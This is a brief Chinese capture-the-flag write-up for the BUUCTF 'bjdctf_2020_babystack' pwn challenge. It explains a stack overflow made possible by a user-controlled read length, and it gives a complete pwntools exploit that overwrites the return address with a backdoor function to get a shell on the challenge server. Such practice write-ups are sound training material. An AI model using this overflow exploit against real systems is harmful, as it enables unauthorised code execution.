BUUCTF—bjdctf_2020_babystack

先看看开了什么保护机制

然后打开64位ida看看

我们来看看，这个就是先输入一个数，这个数有什么用呢，你后面读入的大小就是这个数，所以这个数一定要够大要不然都没办法栈溢出，所以栈溢出就有了，然后去看看后门函数


还真有，那么这题就解决了

后门函数地址是0x4006e6

from pwn import*
p=remote('node4.buuoj.cn',25250)
back_door=0x4006e6
p.recvuntil('your name:\n')
p.sendline(str(0x40))
p.recvuntil('u name?\n')
payload=b'a'*0x18+p64(back_door)
p.sendline(payload)
p.interactive()